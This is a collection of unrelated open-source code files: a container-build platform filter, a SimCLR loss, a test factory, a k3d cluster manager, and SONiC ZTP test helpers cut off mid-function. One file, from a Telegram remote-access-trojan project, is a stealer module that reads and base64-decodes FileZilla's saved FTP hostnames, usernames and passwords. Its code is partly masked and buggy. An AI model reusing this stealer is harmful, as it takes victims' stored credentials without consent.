if is_scratch_build(self.workflow) or is_isolated_build(self.workflow):
override_platforms = set(user_platforms or [])
if override_platforms and override_platforms != set(platforms):
sorted_platforms = sorted(override_platforms)
self.log.info("Received user specified platforms %s", sorted_platforms)
self.log.info("Using them instead of koji platforms")
# platforms from user params do not match platforms from koji target
# that almost certainly means they were overridden and should be used
self.workflow.build_dir.init_build_dirs(sorted_platforms, self.workflow.source)
return sorted_platforms
else:
platforms = user_platforms
self.log.info(
"No koji platforms. User specified platforms are %s",
sorted(platforms) if platforms else None,
)
if not platforms:
raise RuntimeError("Cannot determine platforms; no koji target or platform list")
# Filter platforms based on configured remote hosts
remote_host_pools = self.workflow.conf.remote_hosts.get("pools", {})
enabled_platforms = []
defined_but_disabled = []
def has_enabled_hosts(platform: str) -> bool:
platform_hosts = remote_host_pools.get(platform, {})
return any(host_info["enabled"] for host_info in platform_hosts.values())
for p in platforms:
if has_enabled_hosts(p):
enabled_platforms.append(p)
elif p in remote_host_pools:
defined_but_disabled.append(p)
else:
self.log.warning("No remote hosts found for platform '%s' in "
"reactor config map, skipping", p)
if defined_but_disabled:
msg = 'Platforms specified in config map, but have all remote hosts disabled' \
' {}'.format(defined_but_disabled)
raise RuntimeError(msg)
final_platforms = self._limit_platforms(enabled_platforms)
self.log.info("platforms in limits : %s", final_platforms)
if not final_platforms:
self.log.error("platforms in limits are empty")
raise RuntimeError("No platforms to build for")
self.workflow.build_dir.init_build_dirs(final_platforms, self.workflow.source)
return final_platforms
|
solo/losses/simclr.py | xwyzsn/solo-learn | 693 | 32460 | <filename>solo/losses/simclr.py
# Copyright 2021 solo-learn development team.
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies
# or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
# FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
import torch
import torch.nn.functional as F
from solo.utils.misc import gather, get_rank
def simclr_loss_func(
z: torch.Tensor, indexes: torch.Tensor, temperature: float = 0.1
) -> torch.Tensor:
"""Computes SimCLR's loss given batch of projected features z
from different views, a positive boolean mask of all positives and
a negative boolean mask of all negatives.
Args:
z (torch.Tensor): (N*views) x D Tensor containing projected features from the views.
indexes (torch.Tensor): unique identifiers for each crop (unsupervised)
or targets of each crop (supervised).
Return:
torch.Tensor: SimCLR loss.
"""
z = F.normalize(z, dim=-1)
gathered_z = gather(z)
sim = torch.exp(torch.einsum("if, jf -> ij", z, gathered_z) / temperature)
gathered_indexes = gather(indexes)
indexes = indexes.unsqueeze(0)
gathered_indexes = gathered_indexes.unsqueeze(0)
# positives
pos_mask = indexes.t() == gathered_indexes
pos_mask[:, z.size(0) * get_rank() :].fill_diagonal_(0)
# negatives
neg_mask = indexes.t() != gathered_indexes
pos = torch.sum(sim * pos_mask, 1)
neg = torch.sum(sim * neg_mask, 1)
loss = -(torch.mean(torch.log(pos / (pos + neg))))
return loss
|
src/thenewboston/factories/network_validator.py | achalpatel/thenewboston-python | 122 | 32490 | from factory import Faker
from .network_node import NetworkNodeFactory
from ..constants.network import ACCOUNT_FILE_HASH_LENGTH, BLOCK_IDENTIFIER_LENGTH, MAX_POINT_VALUE, MIN_POINT_VALUE
from ..models.network_validator import NetworkValidator
class NetworkValidatorFactory(NetworkNodeFactory):
daily_confirmation_rate = Faker('pyint', max_value=MAX_POINT_VALUE, min_value=MIN_POINT_VALUE)
root_account_file = Faker('url')
root_account_file_hash = Faker('text', max_nb_chars=ACCOUNT_FILE_HASH_LENGTH)
seed_block_identifier = Faker('text', max_nb_chars=BLOCK_IDENTIFIER_LENGTH)
class Meta:
model = NetworkValidator
abstract = True
|
Core/Stealer/FileZilla.py | HugoMskn/Telegram-RAT | 375 | 32516 | # Import modules
import os
from xml.dom import minidom
from base64 import b64decode
# Fetch servers from FileZilla
FileZilla = os.getenv('AppData') + '\\FileZilla\\'
def StealFileZilla():
if not os.path.exists(FileZilla):
return []
RecentServersPath = FileZilla + 'recentservers.xml'
SiteManagerPath = FileZilla + 'sitemanager.xml'
# Read recent servers
if os.path.exists(RecentServersPath):
xmlDoc = minidom.parse(RecentServersPath)
Servers = xmlDoc.getElementsByTagName('Server')
for Node in Servers:
Server = {
'Hostname': 'ftp://' + Node.getElementsByTagName('Host')[0].firstChild.data + ':' + Node.getElementsByTagName('Port')[0].firstChild.data + '/',
'Username': Node.getElementsByTagName('User')[0].firstChild.data,
'Password': <PASSWORD>(Node.getElementsByTagName('Pass')[0].firstChild.data).decode()
}
# Read sitemanager
if os.path.exists(SiteManagerPath):
xmlDoc = minidom.parse(SiteManagerPath)
Servers = xmlDoc.getElementsByTagName('Server')
for Node in Servers:
Server = {
'Hostname': 'ftp://' + Node.getElementsByTagName('Host')[0].firstChild.data + ':' + Node.getElementsByTagName('Port')[0].firstChild.data + '/',
'Username': Node.getElementsByTagName('User')[0].firstChild.data,
'Password': <PASSWORD>(Node.getElementsByTagName('Pass')[0].firstChild.data).decode()
}
return Server |
src/k3d.py | maiki/k3x | 188 | 32533 | # k3d.py
#
# Copyright 2020 <NAME>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import logging
import os
import ssl
import subprocess
import time
import urllib.error
import urllib.request
import datetime
from dateutil.parser import parse
from typing import Dict, Iterator, List
from typing import Optional, Tuple, Callable
from gi.repository import GObject
from .config import APP_ENV_PREFIX
from .config import ApplicationSettings
from .config import (DEFAULT_EXTRA_PATH,
DEFAULT_API_SERVER_PORT_RANGE,
DEFAULT_K3D_WAIT_TIME)
from .docker import DockerController
from .helm import HelmChart, cleanup_for_owner
from .utils import (call_in_main_thread,
find_unused_port_in_range,
parse_or_get_address,
find_executable,
run_command_stdout)
from .utils_ui import show_notification
# the header/footer length in the "k3d list" output
K3D_LIST_HEADER_LEN = 3
K3D_LIST_FOOTER_LEN = 1
# directory in the K3s conatiner where we should put manifests for being automatically loaded
K3D_DOCKER_MANIFESTS_DIR = "/var/lib/rancher/k3s/server/manifests/"
###############################################################################
k3d_exe = find_executable("k3d", extra_paths=DEFAULT_EXTRA_PATH)
logging.debug(f"k3d found at {k3d_exe}")
def run_k3d_command(*args, **kwargs) -> Iterator[str]:
"""
Run a k3d command
"""
logging.debug(f"[K3D] Running k3d command: {args}")
yield from run_command_stdout(k3d_exe, *args, **kwargs)
###############################################################################
# errors
###############################################################################
class K3dError(Exception):
"""Base class for other k3d exceptions"""
pass
class EmptyClusterNameError(K3dError):
"""No cluster name"""
pass
class InvalidNumWorkersError(K3dError):
"""Invalid num workers"""
pass
class ClusterCreationError(K3dError):
"""Cluster creation error"""
pass
class ClusterDestructionError(K3dError):
"""Cluster destruction error"""
pass
class ClusterNotFoundError(K3dError):
"""Cluster not found error"""
pass
class NoKubeconfigObtainedError(K3dError):
"""No kubeconfig obtained error"""
pass
class NoServerError(K3dError):
"""No Docker server error"""
pass
###############################################################################
# k3d clusters
###############################################################################
class K3dCluster(GObject.GObject):
name: str = ""
status: str = "running"
num_workers: int = 0
use_registry: bool = False
registry_name: str = None
registry_port: str = None
registry_volume: str = None
cache_hub: bool = False
api_server: str = None
image: str = None
volumes: Dict[str, str] = {}
charts: List[HelmChart] = []
server_args: str = None
__gsignals__ = {
# a signal emmited when the cluster has been created
"created": (GObject.SIGNAL_RUN_LAST, GObject.TYPE_NONE, (str,)),
# a signal emmited when the cluster has been destroyed
"destroyed": (GObject.SIGNAL_RUN_LAST, GObject.TYPE_NONE, (str,))
}
def __init__(self, settings: ApplicationSettings, docker: DockerController, **kwargs):
super().__init__()
self._docker = docker
self._settings = settings
self._kubeconfig = None
self._docker_created: Optional[datetime.datetime] = None
self._docker_server_ip = None
self._destroyed = False
self._status = kwargs.pop("status", "running")
self.__dict__.update(kwargs)
# TODO: check the name is valid
if len(self.name) == 0:
raise InvalidNumWorkersError
if self.num_workers < 0:
raise InvalidNumWorkersError
def __str__(self) -> str:
return f"{self.name}"
def __eq__(self, other) -> bool:
if other is None:
return False
if isinstance(other, K3dCluster):
return self.name == other.name
if isinstance(other, str):
return self.name == other
logging.warning(f"Comparing cluster {self.name} to incompatible type {other}")
return NotImplemented
def __ne__(self, other) -> bool:
if other is None:
return True
if isinstance(other, K3dCluster):
return self.name != other.name
if isinstance(other, str):
return self.name != other
logging.warning(f"Comparing cluster {self.name} to incompatible type {other}")
return NotImplemented
def quit(self):
pass
def create(self, wait=True) -> None:
"""
Create the cluster by invoking `k3d create`
"""
args = []
kwargs = {}
if not self.name:
raise EmptyClusterNameError()
args += [f"--name={self.name}"]
if self.use_registry:
args += ["--enable-registry"]
if self.cache_hub:
args += ["--enable-registry-cache"]
if self.registry_volume:
args += [f"--registry-volume={self.registry_volume}"]
if self.registry_name:
args += [f"--registry-name={self.registry_name}"]
if self.registry_port:
args += [f"--registry-port={self.registry_port}"]
if wait:
args += [f"--wait={DEFAULT_K3D_WAIT_TIME}"]
if self.num_workers > 0:
args += [f"--workers={self.num_workers}"]
if self.image:
args += [f"--image={self.image}"]
# create some k3s server arguments
# by default, we add a custom DNS domain with the same name as the cluster
args += [f"--server-arg=--cluster-domain={self.name}.local"]
if self.server_args:
args += [f"--server-arg={arg}" for arg in self.server_args if len(arg) > 0]
# append any extra volumes
for vol_k, vol_v in self.volumes.items():
args += [f"--volume={vol_k}:{vol_v}"]
# append any extra Charts as volumes too
for chart in self.charts:
src = chart.generate(self)
dst = f"{K3D_DOCKER_MANIFESTS_DIR}/{chart.name}.yaml"
args += [f"--volume={src}:{dst}"]
# use the given API port or find an unused one
self.api_server = parse_or_get_address(self.api_server, *DEFAULT_API_SERVER_PORT_RANGE)
logging.info(f"[K3D] Using API address {self.api_server}")
args += [f"--api-port={self.api_server}"]
# check if we must use an env variable for the DOCKER_HOST
docker_host = self._docker.docker_host
default_docker_host = self._docker.default_docker_host
if docker_host != self._docker.default_docker_host:
logging.debug(f"[K3D] Overriding DOCKER_HOST={docker_host} (!= {default_docker_host})")
new_env = os.environ.copy()
new_env["DOCKER_HOST"] = docker_host
kwargs["env"] = new_env
try:
logging.info(f"[K3D] Creating cluster (with {args})")
while True:
try:
line = next(run_k3d_command("create", *args, **kwargs))
logging.debug(f"[K3D] {line}")
# detect errors in the output
if "level=fatal" in line:
raise ClusterCreationError(line.strip())
except StopIteration:
break
except Exception as e:
logging.error(f"Could not create cluster: {e}. Cleaning up...")
self._cleanup()
self._destroyed = True
raise e
logging.info("[K3D] The cluster has been created")
self._status = "running"
call_in_main_thread(lambda: self.emit("created", self.name))
def destroy(self) -> None:
"""
Destroy this cluster with `k3d delete`
"""
logging.info("[K3D] Destroying cluster")
if not self.name:
raise EmptyClusterNameError()
if self._destroyed:
raise ClusterDestructionError("Trying to destroy an already destroyed cluster")
args = []
args += [f"--name={self.name}"]
args += ["--keep-registry-volume"]
while True:
try:
line = next(run_k3d_command("delete", *args))
logging.debug(f"[K3D] {line}")
except StopIteration:
break
self._cleanup()
self._destroyed = True
call_in_main_thread(lambda: self.emit("destroyed", self.name))
def _cleanup(self) -> None:
"""
Cleanup any remaining things after destroying a cluster
"""
logging.debug(f"[K3D] Cleaning up for {self.name}")
cleanup_for_owner(self.name)
@property
def kubeconfig(self) -> Optional[str]:
"""
Get the kubeconfig file for this cluster, or None if no
"""
if self._destroyed:
return None
# cache the kubeconfig: once obtained, it will not change
if not self._kubeconfig:
for _ in range(0, 20):
try:
line = next(run_k3d_command("get-kubeconfig", f"--name={self.name}"))
except StopIteration:
break
except subprocess.CalledProcessError:
logging.debug(f"[K3D] ... KUBECONFIG for {self.name} not ready yet...")
time.sleep(1)
else:
logging.debug(f"[K3D] ... obtained KUBECONFIG for {self.name} at {line}")
self._kubeconfig = line
break
return self._kubeconfig
@property
def running(self) -> bool:
return self._status == "running"
def start(self) -> None:
if not self.running:
args = []
args += [f"--name={self.name}"]
logging.debug(f"[K3D] Starting {self.name}...")
while True:
try:
line = next(run_k3d_command("start", *args))
logging.debug(f"[K3D] {line}")
except StopIteration:
break
def stop(self) -> None:
if self.running:
args = []
args += [f"--name={self.name}"]
logging.debug(f"[K3D] Stopping {self.name}...")
while True:
try:
line = next(run_k3d_command("stop", *args))
logging.debug(f"[K3D] {line}")
except StopIteration:
break
@property
def docker_created(self) -> Optional[datetime.datetime]:
if self._destroyed:
return None
if self._docker_created is None:
c = self._docker.get_container_by_name(self.docker_server_name)
if c:
t = self._docker.get_container_created(c)
if t:
try:
self._docker_created = parse(t)
except Exception as e:
logging.error(f"[K3D] could not parse time string {t}: {e}")
return self._docker_created
@property
def docker_server_name(self) -> Optional[str]:
if self._destroyed:
return None
return f"k3d-{self.name}-server"
@property
def docker_network_name(self) -> Optional[str]:
if self._destroyed:
return None
return f"k3d-{self.name}"
@property
def docker_server_ip(self) -> Optional[str]:
if self._destroyed:
return None
if not self._docker_server_ip:
c = self._docker.get_container_by_name(self.docker_server_name)
if c:
ip = self._docker.get_container_ip(c, self.docker_network_name)
if ip is None:
raise NoServerError(
f"could not obtain server IP for {self.docker_server_name} in network {self.docker_network_name}")
self._docker_server_ip = ip
return self._docker_server_ip
@property
def dashboard_url(self) -> Optional[str]:
if self._destroyed:
return None
ip = self.docker_server_ip
if ip:
return f"https://{self.docker_server_ip}/"
def check_dashboard(self, *args) -> bool:
"""
Check that the Dashboard is ready
"""
try:
context = ssl._create_unverified_context()
return urllib.request.urlopen(self.dashboard_url, context=context).getcode()
except urllib.error.URLError as e:
logging.info(f"Error when checking {self.dashboard_url}: {e}")
return False
def open_dashboard(self, *args) -> None:
import webbrowser
u = self.dashboard_url
if u is not None:
logging.debug(f"[K3D] Opening '{u}' in default web browser")
webbrowser.open(u)
else:
logging.warning(f"[K3D] No URL to open")
@property
def script_environment(self) -> Dict[str, str]:
"""
Return a dictionary with env variables for running scripts for this cluster
"""
# Note: make sure we do not return any non-string value or subprocess.run will throw an exception.
env = {
f"{APP_ENV_PREFIX}_CLUSTER_NAME": str(self.name),
}
if not self._destroyed:
env.update({
f"{APP_ENV_PREFIX}_REGISTRY_ENABLED": "1" if self.use_registry else "",
f"{APP_ENV_PREFIX}_REGISTRY_NAME": str(self.registry_name) if self.registry_name else "",
f"{APP_ENV_PREFIX}_REGISTRY_PORT": str(self.registry_port) if self.registry_port else "",
f"{APP_ENV_PREFIX}_MASTER_IP": str(self.docker_server_ip) if self.docker_server_ip is not None else "",
f"{APP_ENV_PREFIX}_KUBECONFIG": self.kubeconfig if self.kubeconfig is not None else "",
})
return env
GObject.type_register(K3dCluster)
|
spytest/apis/system/ztp.py | shubav/sonic-mgmt | 132 | 32573 | # This file contains the list of API's for operations on ZTP
# @author : <NAME> (<EMAIL>)
from spytest import st
import apis.system.basic as basic_obj
import utilities.utils as utils_obj
import apis.system.switch_configuration as switch_conf_obj
import apis.system.interface as intf_obj
import apis.routing.ip as ip_obj
import apis.system.reboot as reboot_obj
import apis.system.boot_up as boot_up_obj
import datetime
wait_5 = 5
wait_10 = 10
wait_60 = 60
def show_ztp_status(dut, expect_reboot=False, cli_type=""):
"""
Author: <NAME> (<EMAIL>)
API to show ztp status
:param dut:
:return:
"""
cli_type = st.get_ui_type(dut, cli_type=cli_type)
result = dict()
cli_type = "klish" if cli_type in ["rest-put", "rest-patch"] else cli_type
if cli_type not in ["click", "klish"]:
st.error("UNSUPPORTED CLI TYPE")
return result
command = "sudo ztp status" if cli_type == "click" else "show ztp-status"
output = st.show(dut, command, expect_reboot=False, type=cli_type)
file_name = dict()
timestamps = dict()
#excluded_file_name = ["--sonic-mgmt--#"]
if output:
for row in output:
result["filenames"] = list()
result["timestamps"] = list()
if result.get("service"):
pass
else:
result["service"] = row.get("service", "")
# if not result["source"]:
if result.get("source"):
pass
else:
result["source"] = row.get("source", "")
# if not result["status"]:
if result.get("status"):
pass
else:
result["status"] = row.get("status", "")
# if not result["adminmode"]:
if result.get("adminmode"):
pass
else:
result["adminmode"] = row.get("adminmode", "")
# if not result["timestamp"]:
result["timestamp"] = row.get("timestamp", "")
if row.get("filename"):
if cli_type == "click":
values = row["filename"].split(":")
file_name[values[0].strip()] = values[1].strip()
result["filenames"].append(file_name)
elif cli_type == "klish":
file_name[row.get("filename")] = row.get("filestatus")
result["filenames"].append(file_name)
if row.get("filetimestamp"):
timestamps.update({row.get("filename"):row.get("filetimestamp")})
result["timestamps"].append(timestamps)
# if not result["processingtext"]:
# result["processingtext"] = row["processingtext"] if "processingtext" in row and row["processingtext"] else ""
st.debug(result)
return result
def verify_ztp_config_section_from_status(dut, file_names=list(), status="SUCCESS", cli_type=""):
cli_type = st.get_ui_type(dut, cli_type=cli_type)
"""
Author: <NAME> (<EMAIL>)
API to verify the config section
:param dut:
:param file_names:
:param status:
:return:
"""
is_found = 1
if file_names:
response = show_ztp_status(dut, cli_type=cli_type)
for file_name in file_names:
for names in response["filenames"]:
if names[file_name] != status:
is_found = 0
else:
is_found = 1
if not is_found:
return False
return True
def _verify_ztp_status_with_retry(dut, retry_cnt, cli_type=""):
cli_type = st.get_ui_type(dut, cli_type=cli_type)
"""
Author: <NAME> (<EMAIL>)
API to verify ZTP status with retry value
:param dut:
:param retry_cnt:
:return:
"""
not_started_retry_cnt = 0
st.log("Verifying the ZTP status with retry method ...")
for _ in range(1, retry_cnt + 1):
response = show_ztp_status(dut, cli_type=cli_type)
if response["adminmode"] == "True":
st.log("Found that admin mode as {}".format(response["adminmode"]))
if response["service"] == "Inactive":
st.log("Found that service as {}".format(response["service"]))
if response["status"] == "FAILED":
st.log("Found that status as {}".format(response["status"]))
return False
elif response["status"] == "SUCCESS":
st.log("Found that status as {}".format(response["status"]))
return True
elif response["service"] == "Processing" or response["service"] == "Active Discovery":
st.log("Found that service as {}".format(response["service"]))
if response["status"] == "IN-PROGRESS":
st.log("Found that status as {}".format(response["status"]))
st.wait(3)
elif response["status"] == "FAILED":
st.log("Found that status as {}".format(response["status"]))
return False
elif response["status"] == "Not Started":
st.log("Found that status as {}".format(response["status"]))
not_started_retry_cnt += 1
if not_started_retry_cnt >= retry_cnt:
return False
st.wait(3)
else:
return True
elif response["service"] == "SUCCESS":
st.log("Found that service as {}".format(response["service"]))
return True
else:
st.log("Found that ZTP is disabled hence enabling it ..")
return False
return False
def poll_ztp_status(dut, status=["IN-PROGRESS", "Not Started"], iteration=40, retry=3, cli_type=""):
cli_type = st.get_ui_type(dut, cli_type=cli_type)
"""
API to poll the ztp status
Author: <NAME> (<EMAIL>)
:param dut:
:param status:
:param iteration:
:param retry:
:return:
"""
i = 1
status = list([str(e) for e in status]) if isinstance(status, list) else [status]
while True:
response = show_ztp_status(dut, cli_type=cli_type)
if response["status"] in status:
st.log("Observed {} during polling ...".format(status))
return True
if i > iteration:
st.log("Max polling interval {} exceeded ...".format(i))
return False
i += 1
st.wait(retry)
# This function should be called with running ztp run command
def verify_ztp_status(dut, retry_cnt=0, iteration=300, retry=3, expect_reboot=False, reboot_on_success=list(), cli_type=""):
cli_type = st.get_ui_type(dut, cli_type=cli_type)
"""
Author: <NAME> (<EMAIL>)
API to verify ZTP status
:param dut:
:param retry_cnt:
:return:
"""
retry_count_if_no_response = 0
if retry_cnt:
return _verify_ztp_status_with_retry(dut, retry_cnt, cli_type=cli_type)
else:
st.log("Verifying the ZTP status with iteration method ...")
for _ in range(1, iteration + 1):
response = show_ztp_status(dut, expect_reboot=expect_reboot, cli_type=cli_type)
if not response:
st.log("Observed no response in ZTP status ... retrying {} .. ".format(retry_count_if_no_response))
if retry_count_if_no_response > 5:
st.error("show ztp status returned empty data...")
return False
st.wait(retry)
retry_count_if_no_response += 1
continue
if "service" not in response or "status" not in response or "adminmode" not in response:
st.log("Values of service or status or adminmode is not populated yet, retrying ...")
st.wait(10)
continue
if response["adminmode"] == "True":
if "service" not in response or "status" not in response or "adminmode" not in response:
st.log("Values of service or status or adminmode is not populated yet, retrying ...")
st.wait(retry)
else:
# return verify_ztp_status(dut)
st.log("Found that admin mode as {}".format(response["adminmode"]))
if response["service"] == "Inactive":
st.log("Found that service as {}".format(response["service"]))
if response["status"] == "FAILED":
st.log("Found that status as {}".format(response["status"]))
return False
elif response["status"] == "SUCCESS":
st.log("Found that status as {}".format(response["status"]))
return True
else:
st.log("ZTP status is not in expected values , retrying...")
st.wait(retry)
# return verify_ztp_status(dut)
elif response["service"] == "Processing" or response["service"] == "Active Discovery":
st.log("Found that service as {}".format(response["service"]))
if response["status"] == "IN-PROGRESS":
st.log("Found that status as {}".format(response["status"]))
st.log("Files - {}".format(response["filenames"]))
if reboot_on_success and "filenames" in response and response["filenames"]:
reboot_flag = list(reboot_on_success) if isinstance(reboot_on_success, list) else [reboot_on_success]
if len(response["filenames"]) > 0:
filenames = response["filenames"][0]
for filename in reboot_flag:
if filename in filenames and filenames[filename] == "SUCCESS":
return True
if cli_type == "klish":
if len(response["filenames"]) > 0:
for key,value in response["filenames"][0].items():
if ("configdb-json" in key or "graphservice" in key) and value == "IN-PROGRESS":
st.wait(300)
st.wait(retry)
# return verify_ztp_status(dut)
elif response["status"] == "FAILED":
st.log("Found that status as {}".format(response["status"]))
return False
elif response["status"] == "Not Started":
st.log("Found that status as {}".format(response["status"]))
st.wait(retry)
# return verify_ztp_status(dut)
elif response["status"] == "SUCCESS":
st.log("Found that status as {}".format(response["status"]))
st.wait(retry)
# return verify_ztp_status(dut)
else:
st.log("ZTP status is not in expected values, retrying...")
st.wait(retry)
elif response["service"] == "SUCCESS":
st.log("Found that service as {}".format(response["service"]))
return True
else:
st.log("Found that ZTP is disabled hence enabling it ..")
ztp_operations(dut, "enable")
# ztp_operations(dut, "run")
# return verify_ztp_status(dut)
return False
def get_ztp_timestamp_obj(ztp_timestamp):
"""
Author: <NAME> (<EMAIL>)
API to get ztp timestamp
:param ztp_timestamp:
:return:
"""
try:
return datetime.datetime.strptime(ztp_timestamp, '%Y-%m-%d %H:%M:%S')
except ValueError as e:
st.error(e)
def enable_ztp_if_disabled(dut, iteration=5, delay=1, cli_type=""):
cli_type = st.get_ui_type(dut, cli_type=cli_type)
"""
API to enable ztp if it is disabled, added check for enable in polling mechanism
Author: <NAME> (<EMAIL>)
:param dut:
:param iteration:
:param delay:
:return:
"""
i = 1
while True:
response = show_ztp_status(dut, cli_type=cli_type)
if "adminmode" in response and response["adminmode"] != "True":
st.log("Enabling ZTP ...")
ztp_operations(dut, "enable")
break
if i > iteration:
st.log("ZTP admin mode not found after max iterations ...")
break
i += 1
st.wait(delay)
i = 1
while True:
response = show_ztp_status(dut, cli_type=cli_type)
if "adminmode" in response and response["adminmode"] == "True":
st.log("Admin mode enabled at {} iteration".format(i))
return True
if i > iteration:
st.log("Max iteration {} count reached ".format(i))
return False
i += 1
st.wait(delay)
def ztp_operations(dut, operation, cli_type="", max_time=0):
cli_type = st.get_ui_type(dut, cli_type=cli_type)
"""
Author: <NAME> (<EMAIL>)
API to do ZTP operations
:param dut:
:param operation:
:return:
"""
if cli_type == "click":
supported_opers = ["run", "enable", "disable"]
if operation not in supported_opers:
return False
if operation in ["run", "disable"]:
command = "ztp {} -y".format(operation)
else:
command = "ztp {}".format(operation)
elif cli_type == "klish":
no_form = "no" if operation == "disable" else ""
command = "{} ztp enable".format(no_form)
st.config(dut, command, type=cli_type, max_time=max_time)
def ztp_push_full_config(dut, cli_type=""):
"""
NOT USED ANYWHERE
Author: <NAME> (<EMAIL>)
APU to push full config
:param dut:
:return:
"""
cli_type = st.get_ui_type(dut, cli_type=cli_type)
config_dbjson = "config_db.json"
config_file = "ztp_data_local.json"
plugin_file_path = "/etc/sonic/ztp/{}".format(config_file)
source = "/tmp/{}".format(config_dbjson)
plugin_json = {config_dbjson: {"url": {"source": "file://{}".format(source),
"timeout": 300}, "save-config": "true"}}
file_path = basic_obj.write_to_json_file(plugin_json)
st.upload_file_to_dut(dut, file_path, plugin_file_path)
running_config = switch_conf_obj.get_running_config(dut)
file_path = basic_obj.write_to_json_file(running_config)
st.upload_file_to_dut(dut, file_path, source)
st.wait(wait_5)
ztp_operations(dut, "run")
st.wait(wait_60)
show_ztp_status(dut, cli_type=cli_type)
st.wait(wait_10)
show_ztp_status(dut, cli_type=cli_type)
def prepare_and_write_option_67_config_string(ssh_conn_obj, static_ip, config_path, config_file, dhcp_config_file, type="http"):
"""
NOT USED ANYWHERE
Author: <NAME> (<EMAIL>)
Common function to write option 67 to DHCP server
:param ssh_conn_obj:
:param static_ip:
:param config_path:
:param config_file:
:param dhcp_config_file:
:param type:
:return:
"""
option_67_config = "option bootfile-name"
if type == "http":
config_json_url = "http://{}{}/{}".format(static_ip, config_path, config_file)
elif type == "tftp":
config_json_url = "tftp://{}/{}/{}".format(static_ip, config_path, config_file)
elif type == "ftp":
config_json_url = "ftp://{}/{}/{}".format(static_ip, config_path, config_file)
option_67_config_string = '{} "{}";'.format(option_67_config, config_json_url)
if not basic_obj.write_update_file(ssh_conn_obj, option_67_config,
option_67_config_string, dhcp_config_file):
st.log("Written content in file {} not found".format(dhcp_config_file))
st.report_fail("content_not_found")
def write_option_67_to_dhcp_server(ssh_conn_obj, data):
"""
NOT USER ANY WHERE
:param ssh_conn_obj:
:param data:
:return:
"""
option_67_config = "option bootfile-name"
if data.type == "http":
config_json_url = "http://{}{}/{}".format(data.static_ip, data.config_path, data.config_file)
elif data.type == "tftp":
config_json_url = "tftp://{}/{}/{}".format(data.static_ip, data.config_path, data.config_file)
elif data.type == "ftp":
config_json_url = "ftp://{}/{}/{}".format(data.static_ip, data.config_path, data.config_file)
option_67_config_string = '{} "{}";'.format(option_67_config, config_json_url)
if not basic_obj.write_update_file(ssh_conn_obj, option_67_config,
option_67_config_string, data.dhcp_config_file):
st.log("Written content in file {} not found".format(data.dhcp_config_file))
st.report_fail("content_not_found")
basic_obj.service_operations(ssh_conn_obj, data.dhcp_service_name, data.action, data.device)
if not verify_dhcpd_service_status(ssh_conn_obj, data.dhcpd_pid):
st.log("{} service not running".format(data.dhcp_service_name))
st.report_fail("service_not_running", data.dhcp_service_name)
def config_and_verify_dhcp_option(ssh_conn_obj, dut, ztp_params, data, expect_reboot=False, reboot_on_success=list(), cli_type=""):
"""
Common function to configure DHCP option along with status / logs verification
Author: <NAME> (<EMAIL>)
:param ssh_conn_obj:
:param dut:
:param ztp_params:
:param data:
:return:
"""
cli_type = st.get_ui_type(dut,cli_type=cli_type)
cli_type = "klish" if cli_type in ["rest-put", "rest-patch"] else cli_type
retry_count = data.retry_count if "retry_count" in data and data.retry_count else 0
iteration = data.iteration if "iteration" in data and data.iteration else 300
delay = data.delay if "delay" in data and data.delay else 3
if "func_name" in data:
syslog_file_names = ["syslog_1_{}".format(data.func_name), "syslog_{}".format(data.func_name)]
# basic_obj.copy_config_db_to_temp(dut, data.config_db_path, data.config_db_temp)
if "config_file_type" in data and data.config_file_type == "text":
file_path = "/tmp/file_temp.json"
basic_obj.write_to_file(ssh_conn_obj, data.json_content, file_path, device="server")
elif "config_file_type" in data and data.config_file_type == "EoL":
file_path = ""
else:
file_path = basic_obj.write_to_json_file(data.json_content)
if file_path:
destination_path = "{}{}/{}".format(ztp_params.home_path, ztp_params.config_path, data.config_file)
basic_obj.copy_file_from_client_to_server(ssh_conn_obj, src_path=file_path, dst_path=destination_path)
if "config_db_location" in data and data.config_db_location == "json":
st.download_file_from_dut(dut, data.config_db_temp, file_path)
destination_path = "{}{}/{}".format(ztp_params.home_path, ztp_params.config_path, data.config_db_file_name)
basic_obj.copy_file_from_client_to_server(ssh_conn_obj, src_path=file_path, dst_path=destination_path)
if "scenario" in data and data.scenario == "invalid-json":
st.log("Writing invalid content to make invalid json ...")
basic_obj.write_to_file_to_line(ssh_conn_obj, ",", 5, destination_path, "server")
if data.option_type == "67":
st.log("Creating {} file on DHCP server ...".format(data.config_file))
data.search_pattern = r'\s*option\s+bootfile-name\s*\S*\s*"\S+";'
data.option_string = "option bootfile-name"
if data.type == "http":
data.option_url = "http://{}{}/{}".format(data.static_ip, data.config_path, data.config_file)
elif data.type == "tftp":
data.option_url = "tftp://{}/{}/{}".format(data.static_ip, data.config_path, data.config_file)
elif data.type == "ftp":
data.option_url = "ftp://{}/{}/{}".format(data.static_ip, data.config_path, data.config_file)
write_option_to_dhcp_server(ssh_conn_obj, data)
basic_obj.service_operations(ssh_conn_obj, data.dhcp_service_name, data.action, data.device)
if not verify_dhcpd_service_status(ssh_conn_obj, data.dhcpd_pid):
st.log("{} service not running".format(data.dhcp_service_name))
st.report_fail("service_not_running", data.dhcp_service_name)
# write_option_67_to_dhcp_server(ssh_conn_obj, data)
data.device_action = "reboot" if cli_type == "klish" else data.device_action
if data.device_action == "reboot":
reboot_type = data.reboot_type if "reboot_type" in data and data.reboot_type else "normal"
